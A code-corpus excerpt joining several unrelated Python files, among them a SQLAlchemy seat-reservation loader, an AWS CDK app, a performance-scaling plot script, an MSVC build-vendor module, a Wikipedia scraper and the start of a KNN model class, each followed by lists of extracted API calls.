"core.forms.PostFo... | [((603, 613), 'core.forms.PostForm', 'PostForm', ([], {}), '()\n', (611, 613), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((1252, 1272), 'django.contrib.auth.logout', 'logout_user', (['request'], {}), '(request)\n', (1263, 1272), True, 'from django.contrib.auth import logout as logout_user\n'), ((1397, 1412), 'core.forms.CreateAccForm', 'CreateAccForm', ([], {}), '()\n', (1410, 1412), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((2521, 2580), 'django.shortcuts.render', 'render', (['request', '"""core/forgotpassword.html"""', "{'form': form}"], {}), "(request, 'core/forgotpassword.html', {'form': form})\n", (2527, 2580), False, 'from django.shortcuts import render\n'), ((2613, 2635), 'core.forms.PostForm', 'PostForm', (['request.POST'], {}), '(request.POST)\n', (2621, 2635), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((3196, 3239), 'django.shortcuts.render', 'render', (['request', '"""core/newpostsuccess.html"""'], {}), "(request, 'core/newpostsuccess.html')\n", (3202, 3239), False, 'from django.shortcuts import render\n'), ((3272, 3294), 'core.models.Category.objects.all', 'Category.objects.all', ([], {}), '()\n', (3292, 3294), False, 'from core.models import Category, Post\n'), ((892, 942), 'django.contrib.auth.authenticate', 'authenticate', ([], {'username': 'username', 'password': 'password'}), '(username=username, password=password)\n', (904, 942), False, 'from django.contrib.auth import authenticate\n'), ((1139, 1177), 'django.template.loader.get_template', 'loader.get_template', (['"""core/login.html"""'], {}), "('core/login.html')\n", (1158, 1177), False, 'from django.template import Context, loader\n'), ((1184, 1193), 'django.template.Context', 'Context', ([], {}), '()\n', (1191, 1193), False, 'from django.template import Context, loader\n'), ((1454, 1481), 'core.forms.CreateAccForm', 'CreateAccForm', (['request.POST'], {}), '(request.POST)\n', (1467, 1481), False, 'from core.forms import CreateAccForm, ForgotPasswordForm, PostForm\n'), ((2330, 2384), 'django.shortcuts.render', 'render', (['request', '"""core/createacc.html"""', "{'form': form}"], {}), "(request, 'core/createacc.html', {'form': form})\n", (2336, 2384), False, 'from django.shortcuts import render\n'), ((2948, 3056), 'core.models.Post.objects.create', 'Post.objects.create', ([], {'title': 'title', 'price': 'price', 'description': 'description', 'poster': 'poster', 'category': 'category'}), '(title=title, price=price, description=description,\n poster=poster, category=category)\n', (2967, 3056), False, 'from core.models import Category, Post\n'), ((3056, 3095), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/newpostsuccess"""'], {}), "('/newpostsuccess')\n", (3076, 3095), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((3133, 3158), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/"""'], {}), "('/')\n", (3153, 3158), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((969, 994), 'django.contrib.auth.login', 'login_user', (['request', 'user'], {}), '(request, user)\n', (979, 994), True, 'from django.contrib.auth import login as login_user\n'), ((1006, 1031), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/"""'], {}), "('/')\n", (1026, 1031), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1052, 1091), 'django.http.HttpResponse', 'HttpResponse', (['"""Error: could not log in"""'], {}), "('Error: could not log in')\n", (1064, 1091), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1796, 1919), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'first_name': 'first_name', 'last_name': 'last_name', 'username': 'username', 'email': 'email', 'password': 'password'}), '(first_name=first_name, last_name=last_name,\n username=username, email=email, password=password)\n', (1820, 1919), False, 'from django.contrib.auth.models import User\n'), ((1930, 1980), 'django.contrib.auth.authenticate', 'authenticate', ([], {'username': 'username', 'password': 'password'}), '(username=username, password=password)\n', (1942, 1980), False, 'from django.contrib.auth import authenticate\n'), ((2257, 2311), 'django.shortcuts.render', 'render', (['request', '"""core/createacc.html"""', "{'form': form}"], {}), "(request, 'core/createacc.html', {'form': form})\n", (2263, 2311), False, 'from django.shortcuts import render\n'), ((2002, 2031), 'django.contrib.auth.login', 'login_user', (['request', 'new_user'], {}), '(request, new_user)\n', (2012, 2031), True, 'from django.contrib.auth import login as login_user\n'), ((2134, 2159), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['"""/"""'], {}), "('/')\n", (2154, 2159), False, 'from django.http import HttpResponse, HttpResponseRedirect\n')] |
import argparse
import logging
import sys
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import ProgrammingError, OperationalError
import models
from seat_info_proxy import __version__
import yaml
__author__ = "<NAME>"
__copyright__ = "Ci4Rail GmbH"
__license__ = "MIT"
_logger = logging.getLogger(__name__)
def parse_args(args):
parser = argparse.ArgumentParser(description="Preload DB with seat reservation data")
parser.add_argument(
"--version",
action="version",
version="seat-info-proxy {ver}".format(ver=__version__),
)
parser.add_argument(
"-v",
"--verbose",
dest="loglevel",
help="set loglevel to INFO",
action="store_const",
const=logging.INFO,
)
parser.add_argument(
"-vv",
"--very-verbose",
dest="loglevel",
help="set loglevel to DEBUG",
action="store_const",
const=logging.DEBUG,
)
parser.add_argument(
"-f",
"--file",
dest="filename",
required=True,
help="input yaml"
)
return parser.parse_args(args)
def setup_logging(loglevel):
"""Setup basic logging
Args:
loglevel (int): minimum loglevel for emitting messages
"""
logformat = "[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
logging.basicConfig(
level=loglevel, stream=sys.stdout, format=logformat, datefmt="%Y-%m-%d %H:%M:%S"
)
def main(args):
args = parse_args(args)
setup_logging(args.loglevel)
_logger.debug("Starting preloading db...")
database_uri = os.getenv("DATABASE_URI", "sqlite:///seatinfos.db")
# Connect to db
engine = create_engine(database_uri)
# Create the session
session = sessionmaker()
session.configure(bind=engine)
s = session()
# Delete Table
_logger.info("Cleanup table...")
try:
models.SeatReservation.__table__.drop(engine)
except ProgrammingError:
_logger.info("No table to clean up")
except OperationalError:
_logger.info("No table to clean up")
# Create Table
_logger.info("(Re-)creating table...")
models.SeatReservation.__table__.create(engine)
_logger.info("Loading json...")
with open(args.filename, 'r') as stream:
try:
data = yaml.safe_load(stream)
except yaml.YAMLError as exc:
_logger.error(exc)
try:
_logger.info("Creating Records...")
for i in data:
record = models.SeatReservation(**{
'trainid' : i["trainid"],
'seatid' : i["seatid"],
'startstation' : i["startstation"],
'endstation' : i["endstation"]
})
print(record)
s.add(record) #Add all the records
_logger.info("Attempt to commit all the records...")
s.commit()
except Exception as e:
_logger.error("Errors while adding seatreservation data. Rollback.")
_logger.error('Exception: '+ str(e))
s.rollback()
finally:
s.close() #Close the connection
_logger.info("Done!")
def run():
main(sys.argv[1:])
if __name__ == "__main__":
run()
| [
"logging.getLogger",
"logging.basicConfig",
"sqlalchemy.orm.sessionmaker",
"models.SeatReservation.__table__.create",
"models.SeatReservation",
"argparse.ArgumentParser",
"os.getenv",
"sqlalchemy.create_engine",
"yaml.safe_load",
"models.SeatReservation.__table__.drop"
] | [((346, 373), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (363, 373), False, 'import logging\n'), ((411, 487), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Preload DB with seat reservation data"""'}), "(description='Preload DB with seat reservation data')\n", (434, 487), False, 'import argparse\n'), ((1394, 1499), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'loglevel', 'stream': 'sys.stdout', 'format': 'logformat', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(level=loglevel, stream=sys.stdout, format=logformat,\n datefmt='%Y-%m-%d %H:%M:%S')\n", (1413, 1499), False, 'import logging\n'), ((1657, 1708), 'os.getenv', 'os.getenv', (['"""DATABASE_URI"""', '"""sqlite:///seatinfos.db"""'], {}), "('DATABASE_URI', 'sqlite:///seatinfos.db')\n", (1666, 1708), False, 'import os\n'), ((1743, 1770), 'sqlalchemy.create_engine', 'create_engine', (['database_uri'], {}), '(database_uri)\n', (1756, 1770), False, 'from sqlalchemy import create_engine\n'), ((1811, 1825), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {}), '()\n', (1823, 1825), False, 'from sqlalchemy.orm import sessionmaker\n'), ((2215, 2262), 'models.SeatReservation.__table__.create', 'models.SeatReservation.__table__.create', (['engine'], {}), '(engine)\n', (2254, 2262), False, 'import models\n'), ((1953, 1998), 'models.SeatReservation.__table__.drop', 'models.SeatReservation.__table__.drop', (['engine'], {}), '(engine)\n', (1990, 1998), False, 'import models\n'), ((2377, 2399), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (2391, 2399), False, 'import yaml\n'), ((2567, 2711), 'models.SeatReservation', 'models.SeatReservation', ([], {}), "(**{'trainid': i['trainid'], 'seatid': i['seatid'],\n 'startstation': i['startstation'], 'endstation': i['endstation']})\n", (2589, 2711), False, 'import models\n')] |
#!/usr/bin/env python3
import os
import jsii
import aws_cdk as cdk
from aws_cdk import (
Aspects,
CfnResource
)
@jsii.implements(cdk.IAspect)
class ForceDeletion:
def visit(self, scope):
if isinstance(scope, CfnResource):
scope.apply_removal_policy(cdk.RemovalPolicy.DESTROY)
from step_functions_example.step_functions_example_stack import StepFunctionsExampleStack
app = cdk.App()
my_stack = StepFunctionsExampleStack(app, "SFN2",
# If you don't specify 'env', this stack will be environment-agnostic.
# Account/Region-dependent features and context lookups will not work,
# but a single synthesized template can be deployed anywhere.
# Uncomment the next line to specialize this stack for the AWS Account
# and Region that are implied by the current CLI configuration.
#env=cdk.Environment(account=os.getenv('CDK_DEFAULT_ACCOUNT'), region=os.getenv('CDK_DEFAULT_REGION')),
# Uncomment the next line if you know exactly what Account and Region you
# want to deploy the stack to. */
#env=cdk.Environment(account='123456789012', region='us-east-1'),
# For more information, see https://docs.aws.amazon.com/cdk/latest/guide/environments.html
)
Aspects.of(my_stack).add(ForceDeletion())
app.synth()
| [
"aws_cdk.Aspects.of",
"aws_cdk.App",
"jsii.implements",
"step_functions_example.step_functions_example_stack.StepFunctionsExampleStack"
] | [((124, 152), 'jsii.implements', 'jsii.implements', (['cdk.IAspect'], {}), '(cdk.IAspect)\n', (139, 152), False, 'import jsii\n'), ((410, 419), 'aws_cdk.App', 'cdk.App', ([], {}), '()\n', (417, 419), True, 'import aws_cdk as cdk\n'), ((431, 469), 'step_functions_example.step_functions_example_stack.StepFunctionsExampleStack', 'StepFunctionsExampleStack', (['app', '"""SFN2"""'], {}), "(app, 'SFN2')\n", (456, 469), False, 'from step_functions_example.step_functions_example_stack import StepFunctionsExampleStack\n'), ((1229, 1249), 'aws_cdk.Aspects.of', 'Aspects.of', (['my_stack'], {}), '(my_stack)\n', (1239, 1249), False, 'from aws_cdk import Aspects, CfnResource\n')] |
#!/usr/bin/env python
# Copyright 2015-2017 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import matplotlib.pyplot as plt
import argparse
import json
from pr_json_common import *
from json_dict_common import *
from math import nan
scalings = { 'constant' : (lambda x, y : 1.),
'lineard' : (lambda x, y : float(x) / y),
'lineari' : (lambda x, y : float(y) / x),
'quadraticd' : (lambda x, y : float(x**2) / y**2),
'quadratici' : (lambda x, y : float(y**2) / x**2)
}
def isDecreasing(name):
assert isinstance(name, str)
return name[-1] == 'd'
#### End of function isDecreasing
def read_summary_data_from_files(fileList, threads=False):
"""
Reads the MPI, IO and CPU percentage fields from the list of files passed
in. It is assumed that the files all relate to the same application, but
that the number of processes differs
Args:
fileList (list): List of filenames to read data from
threads (bool): Indicates whether threads, instead of processes,
should be read from the summary files
Returns:
A dictionary containing the processor count with the tuple of I/O, MPI
and CPU data (in that order)
"""
assert isinstance(fileList, list)
barDict = {}
timeDict = {}
# Loop over the filenames
for filename in fileList:
filename = filename.strip()
try:
# Open the file for reading
with open(filename, "r") as infile:
# Read the json
jsonDict = json.load(infile)
runtime = get_runtime(jsonDict)
numprocs = get_num_threads(jsonDict) if threads else get_num_processes(jsonDict)
# Read the overview data
subDict = get_overview_data(jsonDict)
vals = [get_dict_field_val(subDict, [key, "percent"]) for key in ["io", "mpi", "cpu"]]
timevals = [(x / 100.) * runtime for x in vals]
barDict[numprocs] = vals
timeDict[numprocs] = timevals
except IOError:
print("File " + filename + " does not exist. Skipping.")
pass
return barDict, timeDict
#### End of function read_summary_data_from_files
def get_ideal_func(expected):
return scalings[expected]
def get_ideal_line(initTime, coreCounts, expected):
"""
Gets data for an ideal scaling line in either the weak or strong case.
Args:
initTime (float): The initial time from which to draw an ideal scaling
coreCounts (list): List of counts of cores from which the ideal line
can be calculated
expected (str): Indicates what sort of scaling is expected for the
ideal line
"""
idealData = [0. for _ in coreCounts]
idealData[0] = initTime
scalingFunc = get_ideal_func(expected)
for i in range(1,len(coreCounts)):
idealData[i] = idealData[i-1] * scalingFunc(coreCounts[i-1], coreCounts[i])
return idealData
#### End of function get_ideal_line
def plot_bar_data(barData, threads=False):
"""
Plots the data contained in the dictionary passed in. This should be of the
form
{ numprocs : [io, mpi, cpu] }
where all the variables listed are numeric
Args:
barData (dict): A dictionary assumed to have a very specific format
Returns:
Nothing
"""
assert isinstance(barData, dict)
# Get the list of keys and sort them
sortedKeys = sorted(barData.keys())
x = range(len(sortedKeys))
# Get the appropriate data
ioData = [barData[key][0] for key in sortedKeys]
mpiData = [barData[key][1] for key in sortedKeys]
cpuData = [barData[key][2] for key in sortedKeys]
# Set the width of the bar
barWidth=0.3
# Plot the appropriate data. Use the current figure
#ax = plt.gca()
ax = plt.subplot(211)
ax.bar([item - barWidth for item in x], ioData, width=barWidth, color='r', align='center', label="io")
ax.bar(x, mpiData, width=barWidth, color='b', align='center', label="mpi")
ax.bar([item + barWidth for item in x], cpuData, width=barWidth, color='g', align='center', label="cpu")
ax.set_xticks(x)
ax.set_xticklabels(sortedKeys)
if (threads):
ax.set_xlabel("Number of Threads")
else:
ax.set_xlabel("Number of Processes")
ax.set_ylabel("Proportion of Time (%)")
ax.legend(loc=1, bbox_to_anchor=(1.1, 1.1))
#### End of function plot_bar_data
def noneIfZero(myList, func):
return None if all(item == 0 for item in myList) else func(myList)
#### End of function noneIfZero
def plot_time_data(timeData, threads=False, expected=None):
"""
Plots the data given in the dictionary of time data. The keys in here are
the number of processes that are used, and the values are the wallclock
time for the I/O, MPI and CPU portions of a run. It is assumed that the
runs represent the strong scaling of a program to more processes.
Specifically, the data is of the form
{ numprocs : [io, mpi, cpu] }
where all the variables listed are numeric
Args:
timeData (dict): A dictionary assumed to have a very specific format
Returns:
Nothing
"""
assert isinstance(timeData, dict)
# Get the list of keys and sort them
sortedKeys = sorted(timeData.keys())
x = range(len(sortedKeys))
# Get the appropriate data
ioData = [timeData[key][0] for key in sortedKeys]
mpiData = [timeData[key][1] for key in sortedKeys]
cpuData = [timeData[key][2] for key in sortedKeys]
#ax = plt.gca()
ax = plt.subplot(212)
handles = []
if expected:
#idealInit = (sum(ioData) + sum(mpiData) + sum(cpuData)) / \
# (len(ioData) + len(mpiData) + len(cpuData))
expectedStyles = ['k-', 'k--']
for cnt, scaling in enumerate(expected):
label = scaling[0:-1] if scaling[-1] == 'i' or scaling == 'd' else scaling
# Plot an ideal line
idealFunc = max if isDecreasing(scaling) else min
#idealInit = idealFunc([idealFunc(data) for data in [ioData, mpiData, cpuData]])
idealInit = idealFunc([data for data in [noneIfZero(ioData, idealFunc),
noneIfZero(mpiData, idealFunc), noneIfZero(cpuData, idealFunc)] if data]) * 2
idealHandle, = ax.semilogy(x, get_ideal_line(idealInit, sortedKeys, scaling),
expectedStyles[cnt], label=label)
handles.append(idealHandle)
# We want a log plot of the results
if (any(ioData)):
ioHandle, = ax.semilogy(x, ioData, 'r-', label="io", linewidth=2)
handles.append(ioHandle)
if (any(mpiData)):
mpiHandle, = ax.semilogy(x, mpiData, 'b-', label="mpi", linewidth=2)
handles.append(mpiHandle)
if (any(cpuData)):
cpuHandle, = ax.semilogy(x, cpuData, 'g-', label="cpu", linewidth=2)
handles.append(cpuHandle)
# Set the legend, axes label and ticks
#ax.legend(handles=handles, loc=1, bbox_to_anchor=(1.1, 1.1))
ax.legend(handles=handles, loc=1, bbox_to_anchor=(0.25, 1.1))
ax.set_xticks(x)
ax.set_xticklabels(sortedKeys)
if (threads):
ax.set_xlabel("Number of Threads")
else:
ax.set_xlabel("Number of Processes")
ax.set_ylabel("Wallclock time (s)")
#### End of function plot_time_data
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Utility to plot a set of line " +
"charts for the MPI, I/O and CPU activity recorded in a set of " +
"Performance Report profiles. It is assumed that the set of profiles " +
"passed in is generated for strong / weak scaling runs for a " +
"particular program")
# Add a file containing a list of files to read data from
parser.add_argument("infile", help="Text file to read a list of input files from",
type=argparse.FileType('r'))
# Add an argument to show if the strong scaling is for threads or processes
parser.add_argument("--threads", help="Indicates whether threads or processes" +
" should used in the scaling analysis", action="store_true",
default=False)
parser.add_argument("--expected", help="Indicates which scaling is expected" +
" for the model. This should be one of ['constant', 'linear[i/d]'," +
" 'quadratic[i/d]']. The i or d suffix indicates increasing or " +
"decreasing scale", choices=sorted(scalings.keys()), nargs="+",
default=None)
args = parser.parse_args()
# Read the list of files
fileList = args.infile.readlines()
# Get the summary data from the files
barData, timeData = read_summary_data_from_files(fileList, args.threads)
# Plot the summary data in a bar chart
plot_bar_data(barData, args.threads)
#plt.show()
plot_time_data(timeData, args.threads, args.expected)
plt.show()
| [
"argparse.FileType",
"argparse.ArgumentParser",
"json.load",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show"
] | [((4410, 4426), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (4421, 4426), True, 'import matplotlib.pyplot as plt\n'), ((6153, 6169), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (6164, 6169), True, 'import matplotlib.pyplot as plt\n'), ((7955, 8268), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': "('Utility to plot a set of line ' +\n 'charts for the MPI, I/O and CPU activity recorded in a set of ' +\n 'Performance Report profiles. It is assumed that the set of profiles ' +\n 'passed in is generated for strong / weak scaling runs for a ' +\n 'particular program')"}), "(description='Utility to plot a set of line ' +\n 'charts for the MPI, I/O and CPU activity recorded in a set of ' +\n 'Performance Report profiles. It is assumed that the set of profiles ' +\n 'passed in is generated for strong / weak scaling runs for a ' +\n 'particular program')\n", (7978, 8268), False, 'import argparse\n'), ((9481, 9491), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9489, 9491), True, 'import matplotlib.pyplot as plt\n'), ((8464, 8486), 'argparse.FileType', 'argparse.FileType', (['"""r"""'], {}), "('r')\n", (8481, 8486), False, 'import argparse\n'), ((2088, 2105), 'json.load', 'json.load', (['infile'], {}), '(infile)\n', (2097, 2105), False, 'import json\n')] |
# vim: set ts=8 sts=4 sw=4 tw=99 et:
#
# This file is part of AMBuild.
#
# AMBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# AMBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with AMBuild. If not, see <http://www.gnu.org/licenses/>.
import os
import re
from ambuild2 import util
from ambuild2.frontend.v2_2.cpp.deptypes import PchNodes
from ambuild2.frontend.v2_2.cpp.vendor import Archiver, Linker, Vendor
# Microsoft Visual C++
class MSVC(Vendor):
def __init__(self, version):
super(MSVC, self).__init__(version)
@property
def name(self):
return 'msvc'
@property
def behavior(self):
return 'msvc'
@property
def family(self):
return 'msvc'
def like(self, name):
return name == 'msvc'
@property
def definePrefix(self):
return '/D'
@property
def objSuffix(self):
return '.obj'
@property
def debugInfoArgv(self):
return ['/Z7']
def makePchArgv(self, source_file, pch_file, source_type):
return ['/showIncludes', '/nologo', '/Yc', '/c', source_file, '/Fp' + pch_file]
def parseDebugInfoType(self, debuginfo):
if debuginfo == 'bundled':
return 'separate'
return debuginfo
def objectArgs(self, sourceFile, objFile):
return ['/showIncludes', '/nologo', '/c', sourceFile, '/Fo' + objFile]
def programLinkArgv(self, cmd_argv, files, linkFlags, symbolFile, outputFile):
argv = cmd_argv + files
argv += ['/link']
argv += linkFlags
argv += [
'/OUT:' + outputFile,
'/nologo',
]
if symbolFile:
argv += ['/DEBUG', '/PDB:"' + symbolFile + '.pdb"']
return argv
def libLinkArgv(self, cmd_argv, files, linkFlags, symbolFile, outputFile):
argv = cmd_argv + files
argv += ['/link']
argv += linkFlags
argv += [
'/OUT:' + outputFile,
'/nologo',
'/DLL',
]
if symbolFile:
argv += ['/DEBUG', '/PDB:"' + symbolFile + '.pdb"']
return argv
def preprocessArgv(self, sourceFile, outFile):
return ['/showIncludes', '/nologo', '/P', '/c', sourceFile, '/Fi' + outFile]
@staticmethod
def IncludePath(output_path, include_path):
assert os.path.isabs(output_path)
output_path = os.path.normcase(output_path)
if not os.path.isabs(include_path):
abs_include_path = os.path.join(output_path, include_path)
else:
abs_include_path = include_path
abs_include_path = os.path.normcase(abs_include_path)
# Hack - try and get a relative path because CL, with either
# /Zi or /ZI, combined with subprocess, apparently tries and
# looks for paths like c:\bleh\"c:\bleh" <-- wtf
# .. this according to Process Monitor
output_drive, _ = os.path.splitdrive(output_path)
include_drive, _ = os.path.splitdrive(abs_include_path)
if output_drive != include_drive:
return os.path.normcase(include_path)
return os.path.relpath(abs_include_path, output_path)
def formatInclude(self, build_root, output_path, include):
return ['/I', MSVC.IncludePath(output_path, include)]
def formatPchInclude(self, build_root, output_path, pch):
folder, header_name = os.path.split(pch.header_file.path)
# Include path calculation expects a path relative to output_path, so
# we need to transform it.
pch_rel_folder = os.path.relpath(os.path.join(build_root, pch.pch_file.path), output_path)
argv = [
'/Fp' + MSVC.IncludePath(output_path, pch_rel_folder),
'/Yu' + header_name,
'/I',
MSVC.IncludePath(output_path, folder),
]
return argv
##
# MSVC-specific properties.
##
@property
def shared_pdb_name(self):
cl_version = int(self.version_string)
# Truncate down to the major version then correct the offset
# There is some evidence that the first digit of the minor version can be used for the PDB, but I can't reproduce it
cl_version = int(cl_version / 100) - 6
# Microsoft introduced a discontinuity with vs2015
if cl_version >= 13:
cl_version += 1
# Pad it back out again
cl_version *= 10
return 'vc{0}.pdb'.format(cl_version)
# cl.exe /showIncludes does not show anything at all for precompiled headers,
# so the only way we can build a proper dependency is by rebuilding every
# source file that *might* use the PCH, whether or not it actually does.
@property
def pch_needs_strong_deps(self):
return True
# cl.exe precompiles source files, technically, not headers. So we need to
# link against something.
@property
def pch_needs_source_file(self):
return True
@property
def shared_pdb_flags(self):
return set(['/Zi', '/ZI'])
def nameForPch(self, source_file):
return os.path.splitext(source_file)[0] + '.pch'
@property
def emits_dependency_file(self):
return False
class MsvcLinker(Linker):
def __init__(self):
super(MsvcLinker, self).__init__()
def like(self, name):
return name == 'msvc'
class MsvcArchiver(Archiver):
def __init__(self):
super(MsvcArchiver, self).__init__()
def like(self, name):
return name == 'msvc'
def makeArgv(self, base_argv, files, outputFile):
return base_argv + ['/OUT:' + outputFile] + files
| [
"os.path.isabs",
"os.path.splitdrive",
"os.path.join",
"os.path.splitext",
"os.path.split",
"os.path.normcase",
"os.path.relpath"
] | [((2781, 2807), 'os.path.isabs', 'os.path.isabs', (['output_path'], {}), '(output_path)\n', (2794, 2807), False, 'import os\n'), ((2831, 2860), 'os.path.normcase', 'os.path.normcase', (['output_path'], {}), '(output_path)\n', (2847, 2860), False, 'import os\n'), ((3062, 3096), 'os.path.normcase', 'os.path.normcase', (['abs_include_path'], {}), '(abs_include_path)\n', (3078, 3096), False, 'import os\n'), ((3366, 3397), 'os.path.splitdrive', 'os.path.splitdrive', (['output_path'], {}), '(output_path)\n', (3384, 3397), False, 'import os\n'), ((3425, 3461), 'os.path.splitdrive', 'os.path.splitdrive', (['abs_include_path'], {}), '(abs_include_path)\n', (3443, 3461), False, 'import os\n'), ((3569, 3615), 'os.path.relpath', 'os.path.relpath', (['abs_include_path', 'output_path'], {}), '(abs_include_path, output_path)\n', (3584, 3615), False, 'import os\n'), ((3835, 3870), 'os.path.split', 'os.path.split', (['pch.header_file.path'], {}), '(pch.header_file.path)\n', (3848, 3870), False, 'import os\n'), ((2877, 2904), 'os.path.isabs', 'os.path.isabs', (['include_path'], {}), '(include_path)\n', (2890, 2904), False, 'import os\n'), ((2937, 2976), 'os.path.join', 'os.path.join', (['output_path', 'include_path'], {}), '(output_path, include_path)\n', (2949, 2976), False, 'import os\n'), ((3523, 3553), 'os.path.normcase', 'os.path.normcase', (['include_path'], {}), '(include_path)\n', (3539, 3553), False, 'import os\n'), ((4026, 4069), 'os.path.join', 'os.path.join', (['build_root', 'pch.pch_file.path'], {}), '(build_root, pch.pch_file.path)\n', (4038, 4069), False, 'import os\n'), ((5529, 5558), 'os.path.splitext', 'os.path.splitext', (['source_file'], {}), '(source_file)\n', (5545, 5558), False, 'import os\n')] |
import wikipedia
from pprint import pprint
import json, os
class WikipediaScraper:
def __init__(self):
pass
def get(self, term):
try:
results = wikipedia.search(term)
if len(results) == 0:
raise RuntimeError(f'No wikipedia page for: {term}')
best_page = wikipedia.page(results[0], auto_suggest=False)
return dict(title=best_page.title, summary=best_page.summary)
except wikipedia.DisambiguationError as e:
return dict(title=term, summary='No summary could be found as the plant name is ambiguous. Try supplying a more specific plant name, such as "Peppermint" instead of "Mint", or even the latin name, "Mentha piperita," to improve results.')
| [
"wikipedia.page",
"wikipedia.search"
] | [((183, 205), 'wikipedia.search', 'wikipedia.search', (['term'], {}), '(term)\n', (199, 205), False, 'import wikipedia\n'), ((333, 379), 'wikipedia.page', 'wikipedia.page', (['results[0]'], {'auto_suggest': '(False)'}), '(results[0], auto_suggest=False)\n', (347, 379), False, 'import wikipedia\n')] |
"""
The :mod:`fatf.utils.models.models` module holds custom models.
The models implemented in this module are mainly used for used for
FAT Forensics package testing and the examples in the documentation.
"""
# Author: <NAME> <<EMAIL>>
# License: new BSD
import abc
from typing import Optional
import numpy as np
import fatf.utils.array.tools as fuat
import fatf.utils.array.validation as fuav
import fatf.utils.distances as fud
from fatf.exceptions import (IncorrectShapeError, PrefittedModelError,
UnfittedModelError)
__all__ = ['KNN']
class Model(abc.ABC):
"""
An abstract class used to implement predictive models.
This abstract class requires ``fit`` and ``predict`` methods and defines
an optional ``predict_proba`` method.
This is a scikit-learn-inspired model specification and it is being relied
on through out this package.
Raises
------
NotImplementedError
Any of the required methods -- ``fit`` or ``predict`` -- is not
implemented.
"""
# pylint: disable=invalid-name
@abc.abstractmethod
def __init__(self) -> None:
"""
Initialises the abstract model class.
"""
@abc.abstractmethod
def fit(self, X: np.ndarray, y: np.ndarray) -> None:
"""
Fits this predictive model.
Parameters
----------
X : numpy.ndarray
A 2-dimensional numpy data array used to fit the model.
y : numpy.ndarray
A 1-dimensional numpy labels array used to fit the model.
"""
@abc.abstractmethod
def predict(self, X: np.ndarray) -> None:
"""
Predicts labels of new data points using this model.
Parameters
----------
X : numpy.ndarray
A 2-dimensional numpy data array for which labels are predicted.
"""
def predict_proba(self, X: np.ndarray) -> None:
"""
Predicts probabilities of labels for new data points using this model.
Parameters
----------
X : numpy.ndarray
A 2-dimensional numpy data array for which labels probabilities are
predicted.
Raises
------
NotImplementedError
By default this method is not required, hence it raises a
``NotImplementedError``.
"""
raise NotImplementedError
class KNN(Model):
"""
A K-Nearest Neighbours model based on Euclidean distance.
When the ``k`` parameter is set to 0 the model works as a majority class
classifier. In case the count of neighbours (within ``k``) results in a
tie the overall majority class for the whole training data is returned.
Finally, when the training data contains categorical (i.e. non-numerical,
e.g. strings) columns the distance for these columns is 0 when the value
matches and 1 otherwise.
This model can operate in two modes: *classifier* or *regressor*. The first
one works for categorical and numerical targets and provides two predictive
methods: ``predict`` -- for predicting labels and ``predict_proba`` for
predicting probabilities of labels. The regressor mode, on the other hand,
requires the target to be numerical and it only supports the ``predict``
method, which returns the average of the target value of the ``k``
neighbours for the queried data point.
Parameters
----------
k : integer, optional (default=3)
The number of neighbours used to make a prediction. Defaults to 3.
mode : string, optional (default='classifier')
The mode in which the model will operate. Either ``'classifier'``
(``'c'``) or ``'regressor'`` (``'r'``). In the latter case
``predict_proba`` method is disabled.
Raises
------
PrefittedModelError
Raised when trying to fit a model that has already been fitted. Usually
raised when calling the ``fit`` method for the second time. Try using
the ``clear`` method to reset the model before fitting it again.
TypeError
The ``k`` parameter is not an integer.
UnfittedModelError
Raised when trying to predict data with a model that has not been
fitted yet. Try using the ``fit`` method to fit the model first.
ValueError
The ``k`` parameter is a negative number or the ``mode`` parameter does
not have one of the allowed values: ``'c'``, ``'classifier'``, ``'r'``
or ``'regressor'``.
Attributes
----------
_MODES : Set[string]
Possible modes of the KNN model: ``'classifier'`` (``'c'``) or
``'regressor'`` (``'r'``).
_k : integer
The number of neighbours used to make a prediction.
_is_classifier : boolean
True when the model is initialised (and operates) as a classifier.
False when it acts as a regressor.
_is_fitted : boolean
A Boolean variable indicating whether the model is fitted.
_X : numpy.ndarray
The KNN model training data.
_y : numpy.ndarray
The KNN model training labels.
_X_n : integer
The number of data points in the training set.
_unique_y : numpy.ndarray
An array with unique labels in the training labels set ordered
lexicographically.
